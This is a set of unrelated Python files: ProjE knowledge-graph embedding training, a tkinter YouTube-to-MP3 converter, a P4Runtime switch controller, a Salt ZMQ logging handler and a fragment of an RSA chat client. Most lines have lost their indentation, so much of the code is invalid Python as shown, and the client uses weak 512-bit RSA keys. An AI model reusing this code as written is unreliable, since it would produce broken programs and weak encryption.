tf.abs(self.__rel_embedding))
hrt_res_sigmoid = tf.sigmoid(hrt_res)
hrt_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(hrt_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., hr_tlist_weight)
+ tf.log(tf.clip_by_value(1 - hrt_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., tf.neg(hr_tlist_weight)))
trh_res_sigmoid = tf.sigmoid(trh_res)
trh_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(trh_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., tr_hlist_weight)
+ tf.log(tf.clip_by_value(1 - trh_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., tf.neg(tr_hlist_weight)))
return hrt_loss + trh_loss + regularizer_loss * regularizer_weight
def test(self, inputs, scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
scp.reuse_variables()
h = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 0])
t = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 1])
r = tf.nn.embedding_lookup(self.__rel_embedding, inputs[:, 2])
ent_mat = tf.transpose(self.__ent_embedding)
if self.__combination_method.lower() == 'simple':
# predict tails
hr = h * self.__hr_weighted_vector[:self.__embed_dim] + r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.sigmoid(tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat))
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
# predict heads
tr = t * self.__tr_weighted_vector[:self.__embed_dim] + r * self.__tr_weighted_vector[self.__embed_dim:]
trh_res = tf.sigmoid(tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat))
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
else:
hr = tf.matmul(tf.concat(1, [h, r]), self.__hr_combination_matrix)
hrt_res = tf.sigmoid(tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat))
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
tr = tf.matmul(tf.concat(1, [t, r]), self.__tr_combination_matrix)
trh_res = tf.sigmoid(tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat))
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
return head_ids, tail_ids
def train_ops(model: ProjE, learning_rate=0.1, optimizer_str='gradient', regularizer_weight=1.0):
with tf.device('/cpu'):
train_hrt_input = tf.placeholder(tf.int32, [None, 2])
train_hrt_weight = tf.placeholder(tf.float32, [None, model.n_entity])
train_trh_input = tf.placeholder(tf.int32, [None, 2])
train_trh_weight = tf.placeholder(tf.float32, [None, model.n_entity])
loss = model.train([train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight],
regularizer_weight=regularizer_weight)
if optimizer_str == 'gradient':
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'rms':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
else:
raise NotImplementedError("Does not support %s optimizer" % optimizer_str)
grads = optimizer.compute_gradients(loss, model.trainable_variables)
op_train = optimizer.apply_gradients(grads)
return train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, loss, op_train
def test_ops(model: ProjE):
with tf.device('/cpu'):
test_input = tf.placeholder(tf.int32, [None, 3])
head_ids, tail_ids = model.test(test_input)
return test_input, head_ids, tail_ids
def worker_func(in_queue: JoinableQueue, out_queue: Queue, hr_t, tr_h):
while True:
dat = in_queue.get()
if dat is None:
in_queue.task_done()
continue
testing_data, head_pred, tail_pred = dat
out_queue.put(test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h))
in_queue.task_done()
def data_generator_func(in_queue: JoinableQueue, out_queue: Queue, tr_h, hr_t, n_entity, neg_weight):
while True:
dat = in_queue.get()
if dat is None:
break
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
htr = dat
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in tr_h[htr[idx, 1]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in hr_t[htr[idx, 0]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
out_queue.put((np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32),
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)))
def test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h):
assert len(testing_data) == len(head_pred)
assert len(testing_data) == len(tail_pred)
mean_rank_h = list()
mean_rank_t = list()
filtered_mean_rank_h = list()
filtered_mean_rank_t = list()
for i in range(len(testing_data)):
h = testing_data[i, 0]
t = testing_data[i, 1]
r = testing_data[i, 2]
# mean rank
mr = 0
for val in head_pred[i]:
if val == h:
mean_rank_h.append(mr)
break
mr += 1
        mr = 0
        for val in tail_pred[i]:
            if val == t:
                mean_rank_t.append(mr)
                break
            mr += 1
# filtered mean rank
fmr = 0
for val in head_pred[i]:
if val == h:
filtered_mean_rank_h.append(fmr)
break
if t in tr_h and r in tr_h[t] and val in tr_h[t][r]:
continue
else:
fmr += 1
fmr = 0
for val in tail_pred[i]:
if val == t:
filtered_mean_rank_t.append(fmr)
break
if h in hr_t and r in hr_t[h] and val in hr_t[h][r]:
continue
else:
fmr += 1
return (mean_rank_h, filtered_mean_rank_h), (mean_rank_t, filtered_mean_rank_t)
def main(_):
parser = argparse.ArgumentParser(description='ProjE.')
parser.add_argument('--data', dest='data_dir', type=str, help="Data folder", default='./data/FB15k/')
parser.add_argument('--lr', dest='lr', type=float, help="Learning rate", default=0.01)
parser.add_argument("--dim", dest='dim', type=int, help="Embedding dimension", default=200)
parser.add_argument("--batch", dest='batch', type=int, help="Batch size", default=200)
parser.add_argument("--comb", dest="combination_method", type=str, help="Combination method", default='simple')
parser.add_argument("--worker", dest='n_worker', type=int, help="Evaluation worker", default=3)
parser.add_argument("--generator", dest='n_generator', type=int, help="Data generator", default=10)
parser.add_argument("--eval_batch", dest="eval_batch", type=int, help="Evaluation batch size", default=500)
parser.add_argument("--save_dir", dest='save_dir', type=str, help="Model path", default='./')
parser.add_argument("--load_model", dest='load_model', type=str, help="Model file", default="")
parser.add_argument("--save_per", dest='save_per', type=int, help="Save per x iteration", default=10)
parser.add_argument("--eval_per", dest='eval_per', type=int, help="Evaluate every x iteration", default=1)
parser.add_argument("--max_iter", dest='max_iter', type=int, help="Max iteration", default=100)
parser.add_argument("--summary_dir", dest='summary_dir', type=str, help="summary directory",
default='./ProjE_summary/')
parser.add_argument("--keep", dest='drop_out', type=float, help="Keep prob (1.0 keep all, 0. drop all)",
default=0.5)
parser.add_argument("--optimizer", dest='optimizer', type=str, help="Optimizer", default='adam')
parser.add_argument("--prefix", dest='prefix', type=str, help="model_prefix", default='DEFAULT')
parser.add_argument("--loss_weight", dest='loss_weight', type=float, help="Weight on parameter loss", default=1e-5)
parser.add_argument("--neg_weight", dest='neg_weight', type=float, help="Sampling weight on negative examples",
default=0.5)
args = parser.parse_args()
print(args)
model = ProjE(args.data_dir, embed_dim=args.dim, combination_method=args.combination_method,
dropout=args.drop_out, neg_weight=args.neg_weight)
train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, \
train_loss, train_op = train_ops(model, learning_rate=args.lr,
optimizer_str=args.optimizer,
regularizer_weight=args.loss_weight)
test_input, test_head, test_tail = test_ops(model)
with tf.Session() as session:
tf.initialize_all_variables().run()
saver = tf.train.Saver()
iter_offset = 0
if args.load_model is not None and os.path.exists(args.load_model):
saver.restore(session, args.load_model)
iter_offset = int(args.load_model.split('.')[-2].split('_')[-1]) + 1
print("Load model from %s, iteration %d restored." % (args.load_model, iter_offset))
total_inst = model.n_train
# training data generator
raw_training_data_queue = Queue()
training_data_queue = Queue()
data_generators = list()
for i in range(args.n_generator):
data_generators.append(Process(target=data_generator_func, args=(
raw_training_data_queue, training_data_queue, model.tr_h, model.hr_t, model.n_entity, args.neg_weight)))
data_generators[-1].start()
evaluation_queue = JoinableQueue()
result_queue = Queue()
for i in range(args.n_worker):
worker = Process(target=worker_func, args=(evaluation_queue, result_queue, model.hr_t, model.tr_h))
worker.start()
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
            print("waiting for workers to finish their work")
            evaluation_queue.join()
            print("all workers stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] INITIALIZATION [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] INITIALIZATION [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
for n_iter in range(iter_offset, args.max_iter):
start_time = timeit.default_timer()
accu_loss = 0.
accu_re_loss = 0.
ninst = 0
print("initializing raw training data...")
nbatches_count = 0
for dat in model.raw_training_data(batch_size=args.batch):
raw_training_data_queue.put(dat)
nbatches_count += 1
print("raw training data initialized.")
while nbatches_count > 0:
nbatches_count -= 1
hr_tlist, hr_tweight, tr_hlist, tr_hweight = training_data_queue.get()
l, rl, _ = session.run(
[train_loss, model.regularizer_loss, train_op], {train_hrt_input: hr_tlist,
train_hrt_weight: hr_tweight,
train_trh_input: tr_hlist,
train_trh_weight: tr_hweight})
accu_loss += l
accu_re_loss += rl
ninst += len(hr_tlist) + len(tr_hlist)
                # progress line, rewritten in place each batch via end='\r'
                print(
                    '[%d sec](%d/%d) : %.2f -- loss : %.5f rloss: %.5f ' % (
                        timeit.default_timer() - start_time, ninst, total_inst, float(ninst) / total_inst,
                        l / (len(hr_tlist) + len(tr_hlist)),
                        args.loss_weight * (rl / (len(hr_tlist) + len(tr_hlist)))),
                    end='\r')
print("")
print("iter %d avg loss %.5f, time %.3f" % (n_iter, accu_loss / ninst, timeit.default_timer() - start_time))
if n_iter % args.save_per == 0 or n_iter == args.max_iter - 1:
save_path = saver.save(session,
os.path.join(args.save_dir,
"ProjE_" + str(args.prefix) + "_" + str(n_iter) + ".ckpt"))
print("Model saved at %s" % save_path)
if n_iter % args.eval_per == 0 or n_iter == args.max_iter - 1:
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
print("waiting for worker finishes their work")
evaluation_queue.join()
print("all worker stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] ITER %d [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] ITER %d [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
if __name__ == '__main__':
tf.app.run()
|
YTMC.py
|
from youtube_dl import YoutubeDL
import threading
from tkinter import (
Tk,
Label,
Button,
Menu,
PanedWindow,
Entry,
HORIZONTAL,
X,
Y,
BOTH,
END,
LEFT,
RIGHT,
DISABLED,
NORMAL,
)
class Youtube_To_MP3_Converter:
def __init__(self):
self.main_windows = Tk()
# ====================== init main windows ======================
# self.main_windows.protocol("WM_DELETE_WINDOW", self.close_app)
self.main_windows.title("YOUTUBE TO MP3 CONVERTER")
self.main_windows.minsize(300, 80)
self.main_windows.geometry("300x100")
# self.main_windows.iconbitmap("xxx.ico")
# ====================== menu top bar ======================
self.menubar = Menu(self.main_windows)
self.main_windows.config(menu=self.menubar)
# ====================== Entry ======================
self.youtube_url_Entry = Entry(self.main_windows)
self.youtube_url_Entry.pack(fill=X, padx=5, pady=5)
# ====================== panelwindow + buttons ======================
self.panelwindow = PanedWindow(
self.main_windows, orient=HORIZONTAL, width=self.main_windows.winfo_width()
)
self.panelwindow.pack(fill=BOTH)
self.bouton_exit = Button(self.panelwindow, text="EXIT", command=self.close_app)
self.bouton_exit.pack(side=LEFT, padx=5, pady=5)
self.bouton_start_convert = Button(
self.panelwindow,
text="Convert",
command=lambda: threading.Thread(
name="yt_mp3_convert_thread",
target=lambda: self.convert_to_MP3([self.youtube_url_Entry.get()]),
).start(),
)
self.bouton_start_convert.pack(side=RIGHT, padx=5, pady=5)
# ====================== Label ======================
self.Label_avancement = Label(
self.main_windows, text="place your URL and click on Convert"
)
self.Label_avancement.pack(fill=X, padx=5, pady=5)
self.Label_music_name = Label(self.main_windows, text="music :")
self.Label_music_name.pack(fill=X, padx=5, pady=5)
# ====================== Label ======================
self.main_windows.mainloop()
def close_app(self):
self.main_windows.quit()
def my_hook(self, d):
if d["status"] == "downloading":
self.Label_avancement.config(text="downloading")
self.Label_music_name.config(text="")
elif d["status"] == "error":
self.Label_avancement.config(text="!!!!ERROR!!!!")
elif d["status"] == "finished":
self.Label_avancement.config(text="Done downloading, now converting ...")
def convert_to_MP3(self, YT_link):
self.bouton_start_convert.config(state=DISABLED)
self.youtube_url_Entry.config(state=DISABLED)
self.Label_avancement.config(text="Start download")
try:
ydl_opts = {
"format": "bestaudio/best",
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "mp3",
"preferredquality": "192",
}
],
"progress_hooks": [self.my_hook],
"outtmpl": "MP3_files/%(title)s.%(ext)s",
"ffmpeg_location": "ff/",
}
with YoutubeDL(ydl_opts) as youtube_dl:
youtube_dl.download(YT_link)
except Exception as ex:
print(ex)
self.Label_avancement.config(
text="convertion finished, file is now in MP3_file folder"
)
self.Label_music_name.config(text="")
self.youtube_url_Entry.config(state=NORMAL)
self.youtube_url_Entry.delete(0, END)
self.bouton_start_convert.config(state=NORMAL)
|
controller.py
|
#!/usr/bin/env python2
# Copyright 2018-present University of Tuebingen, Chair of Communication Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Marco Haeberle (marco.haeberle@uni-tuebingen.de)
# Joshua Hartmann
#
#
import grpc
from concurrent import futures
import time
import sys
import threading
import argparse
import cli
import switch_controller
import topo_client
import control_server
import control_pb2, control_pb2_grpc
# define some variables
ca_path = '../tools/certstrap/out/p4sec-ca.crt'
cert_path = '../tools/certstrap/out/localhost.crt'
key_path = '../tools/certstrap/out/localhost.key'
def start_control_server(switch_controller, listen_addr):
# create a gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
control_pb2_grpc.add_ControlServicer_to_server(control_server.ControlServer(switch_controller), server)
# prepare tls creds
try:
with open(ca_path, 'rb') as ca_file:
ca = ca_file.read()
except IOError as e:
#print(e)
sys.exit("Error opening CA file")
try:
with open(cert_path, 'rb') as cert_file:
cert = cert_file.read()
except IOError as e:
#print(e)
sys.exit("Error opening cert file")
try:
with open(key_path, 'rb') as key_file:
key = key_file.read()
except IOError as e:
#print(e)
sys.exit("Error opening key file")
server_creds = grpc.ssl_server_credentials([(key, cert)], ca, True)
# listen on the address passed via -l (default localhost:52001)
#print('Starting gRPC server. Listening on ' + listen_addr)
server.add_secure_port(listen_addr, server_creds)
server.start()
# server.start() does not block -> sleep-loop to keep the server alive
while True:
time.sleep(100)
def start_cli(ctrl):
print('starting cli')
cmd = cli.CLI()
cmd.set_controller(ctrl)
cmd.cmdloop()
ctrl.teardown()
parser = argparse.ArgumentParser(description='P4Runtime Controller')
parser.add_argument('--p4info', help='p4info proto in text format from p4c', type=str, action="store", required=False,
default='../p4/p4/build/basic.p4info')
parser.add_argument('--bmv2-json', help='BMv2 JSON file from p4c', type=str, action="store", required=False,
default='../p4/p4/build/basic.json')
parser.add_argument('-a', help='P4Runtime address', type=str, action="store", required=False,
default='127.0.0.1:50051')
parser.add_argument('-s', help='nanomsg socket for notifications from simple_switch', type=str, action="store", required=False,
default='ipc:///tmp/bmv2-0-notifications.ipc')
parser.add_argument('-n', help='name of the switch (needs to be unique)', type=str, action="store", required=False,
default='s0')
parser.add_argument('-d', help='device id of the switch', type=str, action="store", required=False,
default='0')
parser.add_argument('--num-ports', help='number of ports excluding CPU port', type=str, action="store", required=False,
default='15')
parser.add_argument('-c', help='address of the central controller', type=str, action="store", required=False,
default='localhost:51001')
parser.add_argument('-l', help='listen address for control server', type=str, action="store", required=False,
default='localhost:52001')
parser.add_argument('-m', help='mac address of the switch', type=str, action="store", required=False,
default='62:88:00:00:00:01')
args = parser.parse_args()
switch_name = args.n
switch_ip = args.a
notification_socket = args.s
device_id = int(args.d)
num_ports = args.num_ports
controller_address = args.c
listen_address = args.l
mac_address = args.m
# grpc client for communication with central controller
topo_client = topo_client.TopoClient(controller_address)
# global ctrl
ctrl = switch_controller.SwitchController(args.p4info, args.bmv2_json, topo_client, mac_address)
# grpc server for communication with central controller
control_server_t = threading.Thread(target=start_control_server, args=(ctrl, listen_address))
control_server_t.daemon = True
control_server_t.start()
## BMV2 switches
ctrl.add_switch_connection(switch_name,
address=switch_ip,
device_id=device_id,
debug = False,
type = 'bmv2',
notification_socket = notification_socket,
num_ports = num_ports)
ctrl.startup()
topo_client.registerController(listen_address, switch_name, mac_address)
# cli
cli_t = threading.Thread(target=start_cli, args=(ctrl,))
cli_t.daemon = True
cli_t.start()
# exit when CTRL-C is pressed or when the CLI is stopped by entering 'exit'
try:
while cli_t.is_alive():
time.sleep(1)
topo_client.updateTopo(switch_name, {})
except KeyboardInterrupt:
print('shutting down')
topo_client.updateTopo(switch_name, {})
sys.exit(0)
|
pytest_log_handler.py
|
"""
pytest_log_handler
~~~~~~~~~~~~~~~~~~
Salt External Logging Handler
"""
import atexit
import copy
import logging
import os
import pprint
import socket
import sys
import threading
import traceback
try:
from salt.utils.stringutils import to_unicode
except ImportError:
# This is likely due to running backwards compatibility tests against older minions
from salt.utils import to_unicode
try:
from salt._logging.impl import LOG_LEVELS
from salt._logging.mixins import ExcInfoOnLogLevelFormatMixin
except ImportError:
# This is likely due to running backwards compatibility tests against older minions
from salt.log.setup import LOG_LEVELS
from salt.log.mixins import ExcInfoOnLogLevelFormatMixIn as ExcInfoOnLogLevelFormatMixin
try:
from salt._logging.mixins import NewStyleClassMixin
except ImportError:
try:
# This is likely due to running backwards compatibility tests against older minions
from salt.log.mixins import NewStyleClassMixIn as NewStyleClassMixin
except ImportError:
# NewStyleClassMixin was removed from salt
class NewStyleClassMixin(object):
"""
A copy of Salt's previous NewStyleClassMixin implementation
"""
try:
import msgpack
HAS_MSGPACK = True
except ImportError:
HAS_MSGPACK = False
try:
import zmq
HAS_ZMQ = True
except ImportError:
HAS_ZMQ = False
__virtualname__ = "pytest_log_handler"
log = logging.getLogger(__name__)
def __virtual__():
role = __opts__["__role"]
pytest_key = "pytest-{}".format(role)
pytest_config = __opts__[pytest_key]
if "log" not in pytest_config:
return False, "No 'log' key in opts {} dictionary".format(pytest_key)
log_opts = pytest_config["log"]
if "port" not in log_opts:
return (
False,
"No 'port' key in opts['pytest']['log'] or opts['pytest'][{}]['log']".format(
__opts__["role"]
),
)
if HAS_MSGPACK is False:
return False, "msgpack was not importable. Please install msgpack."
if HAS_ZMQ is False:
return False, "zmq was not importable. Please install pyzmq."
return True
def setup_handlers():
role = __opts__["__role"]
pytest_key = "pytest-{}".format(role)
pytest_config = __opts__[pytest_key]
log_opts = pytest_config["log"]
host_addr = log_opts.get("host")
if not host_addr:
import subprocess
if log_opts["pytest_windows_guest"] is True:
proc = subprocess.Popen("ipconfig", stdout=subprocess.PIPE)
for line in proc.stdout.read().strip().encode(__salt_system_encoding__).splitlines():
if "Default Gateway" in line:
parts = line.split()
host_addr = parts[-1]
break
else:
proc = subprocess.Popen(
"netstat -rn | grep -E '^0.0.0.0|default' | awk '{ print $2 }'",
shell=True,
stdout=subprocess.PIPE,
)
host_addr = proc.stdout.read().strip().encode(__salt_system_encoding__)
host_port = log_opts["port"]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host_addr, host_port))
except OSError as exc:
# Don't even bother if we can't connect
log.warning("Cannot connect back to log server at %s:%d: %s", host_addr, host_port, exc)
return
finally:
sock.close()
pytest_log_prefix = log_opts.get("prefix")
try:
level = LOG_LEVELS[(log_opts.get("level") or "error").lower()]
except KeyError:
level = logging.ERROR
handler = ZMQHandler(host=host_addr, port=host_port, log_prefix=pytest_log_prefix, level=level)
handler.setLevel(level)
handler.start()
return handler
class ZMQHandler(ExcInfoOnLogLevelFormatMixin, logging.Handler, NewStyleClassMixin):
# We offload sending the log records to the consumer to a separate
# thread because PUSH sockets WILL block if the receiving end can't
# receive fast enough, thus also blocking the main thread.
#
# To achieve this, we create an inproc zmq.PAIR, which also guarantees
# message delivery, but should be way faster than the PUSH.
# We also set some high enough high water mark values to cope with the
# message flooding.
#
# We also implement a start method which is deferred until sending the
# first message because logging handlers, on platforms which support
# forking, are inherited by forked processes, and we don't want the ZMQ
# machinery inherited.
# For the cases where the ZMQ machinery is still inherited because a
# process was forked after ZMQ has been prepped up, we check the handler's
# pid attribute against the current process pid. If it's not a match, we
# reconnect the ZMQ machinery.
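# As a reading aid, the message flow is roughly:
#   emit() -> self.in_proxy (zmq.PAIR, connect) -> out_proxy in _proxy_logs_target
#   (zmq.PAIR, bound to a random local port) -> pusher (zmq.PUSH) -> log server at self.push_address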
def __init__(self, host="127.0.0.1", port=3330, log_prefix=None, level=logging.NOTSET):
super(ZMQHandler, self).__init__(level=level)
self.pid = os.getpid()
self.push_address = "tcp://{}:{}".format(host, port)
self.log_prefix = self._get_log_prefix(log_prefix)
self.context = self.proxy_address = self.in_proxy = self.proxy_thread = None
self._exiting = False
def _get_log_prefix(self, log_prefix):
if log_prefix is None:
return
if sys.argv[0] == sys.executable:
cli_arg_idx = 1
else:
cli_arg_idx = 0
cli_name = os.path.basename(sys.argv[cli_arg_idx])
return log_prefix.format(cli_name=cli_name)
def start(self):
if self.pid != os.getpid():
self.stop()
self._exiting = False
if self._exiting is True:
return
if self.in_proxy is not None:
return
atexit.register(self.stop)
context = in_proxy = None
try:
context = zmq.Context()
self.context = context
except zmq.ZMQError as exc:
sys.stderr.write(
"Failed to create the ZMQ Context: {}\n{}\n".format(exc, traceback.format_exc(exc))
)
sys.stderr.flush()
# Let's start the proxy thread
socket_bind_event = threading.Event()
self.proxy_thread = threading.Thread(
target=self._proxy_logs_target, args=(socket_bind_event,)
)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that we discovered which random port to use, let's continue with the setup
if socket_bind_event.wait(5) is not True:
sys.stderr.write("Failed to bind the ZMQ socket PAIR\n")
sys.stderr.flush()
context.term()
return
# And we can now also connect the messages input side of the proxy
try:
in_proxy = self.context.socket(zmq.PAIR)
in_proxy.set_hwm(100000)
in_proxy.connect(self.proxy_address)
self.in_proxy = in_proxy
except zmq.ZMQError as exc:
if in_proxy is not None:
in_proxy.close(1000)
sys.stderr.write(
"Failed to bind the ZMQ PAIR socket: {}\n{}\n".format(
exc, traceback.format_exc(exc)
)
)
sys.stderr.flush()
def stop(self):
if self._exiting:
return
self._exiting = True
try:
atexit.unregister(self.stop)
except AttributeError:
# Python 2
try:
atexit._exithandlers.remove((self.stop, (), {}))
except ValueError:
# The exit handler isn't registered
pass
try:
if self.in_proxy is not None:
self.in_proxy.send(msgpack.dumps(None))
self.in_proxy.close(1500)
if self.context is not None:
self.context.term()
if self.proxy_thread is not None and self.proxy_thread.is_alive():
self.proxy_thread.join(5)
except Exception as exc: # pragma: no cover pylint: disable=broad-except
sys.stderr.write(
"Failed to terminate ZMQHandler: {}\n{}\n".format(exc, traceback.format_exc(exc))
)
sys.stderr.flush()
raise
finally:
self.context = self.in_proxy = self.proxy_address = self.proxy_thread = None
def format(self, record):
msg = super(ZMQHandler, self).format(record)
if self.log_prefix:
msg = "[{}] {}".format(to_unicode(self.log_prefix), to_unicode(msg))
return msg
def prepare(self, record):
msg = self.format(record)
record = copy.copy(record)
record.msg = msg
# Reduce network bandwidth, we don't need these any more
record.args = None
record.exc_info = None
record.exc_text = None
record.message = None # redundant with msg
# On Python >= 3.5 we also have stack_info, but we've formatted already so, reset it
record.stack_info = None
try:
return msgpack.dumps(record.__dict__, use_bin_type=True)
except TypeError as exc:
# Failed to serialize something with msgpack
logging.getLogger(__name__).error(
"Failed to serialize log record: %s.\n%s", exc, pprint.pformat(record.__dict__)
)
self.handleError(record)
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
# Python's logging machinery acquires a lock before calling this method
# that's why it's safe to call the start method without an explicit acquire
if self._exiting:
return
self.start()
if self.in_proxy is None:
sys.stderr.write(
"Not sending log message over the wire because "
"we were unable to properly configure a ZMQ PAIR socket.\n"
)
sys.stderr.flush()
return
try:
msg = self.prepare(record)
self.in_proxy.send(msg)
except SystemExit:
pass
except Exception: # pragma: no cover pylint: disable=broad-except
self.handleError(record)
def _proxy_logs_target(self, socket_bind_event):
context = zmq.Context()
out_proxy = pusher = None
try:
out_proxy = context.socket(zmq.PAIR)
out_proxy.set_hwm(100000)
proxy_port = out_proxy.bind_to_random_port("tcp://127.0.0.1")
self.proxy_address = "tcp://127.0.0.1:{}".format(proxy_port)
except zmq.ZMQError as exc:
if out_proxy is not None:
out_proxy.close(1000)
context.term()
sys.stderr.write(
"Failed to bind the ZMQ PAIR socket: {}\n{}\n".format(
exc, traceback.format_exc(exc)
)
)
sys.stderr.flush()
return
try:
pusher = context.socket(zmq.PUSH)
pusher.set_hwm(100000)
pusher.connect(self.push_address)
except zmq.ZMQError as exc:
if pusher is not None:
pusher.close(1000)
context.term()
sys.stderr.write(
"Failed to connect the ZMQ PUSH socket: {}\n{}\n".format(
exc, traceback.format_exc(exc)
)
)
sys.stderr.flush()
socket_bind_event.set()
sentinel = msgpack.dumps(None)
while True:
try:
msg = out_proxy.recv()
if msg == sentinel:
# Received sentinel to stop
break
pusher.send(msg)
except zmq.ZMQError as exc:
sys.stderr.write(
"Failed to proxy log message: {}\n{}\n".format(exc, traceback.format_exc(exc))
)
sys.stderr.flush()
break
# Close the receiving end of the PAIR proxy socket
out_proxy.close(0)
# Allow the pusher socket to send any messages still in its queue for
# the next 1.5 seconds
pusher.close(1500)
context.term()
|
client.py
|
import requests
import rsa
import pickle
import base64
from threading import Thread
import time
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
url = "http://2422-129-97-124-0.ngrok.io/"
def generate_rsa_key():
publicKey, privateKey = rsa.newkeys(512)
return publicKey, privateKey
def encrypt_message(publicKey, message):
encMessage = rsa.encrypt(message.encode(),publicKey)
return encMessage
def decrypt_message(privateKey, message):
decMessage = rsa.decrypt(message, privateKey).decode()
return decMessage
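# Rough usage sketch (illustrative only; with a 512-bit key the plaintext must stay
# under ~53 bytes because of PKCS#1 v1.5 padding):
#   pub, priv = generate_rsa_key()
#   ciphertext = encrypt_message(pub, "hello")
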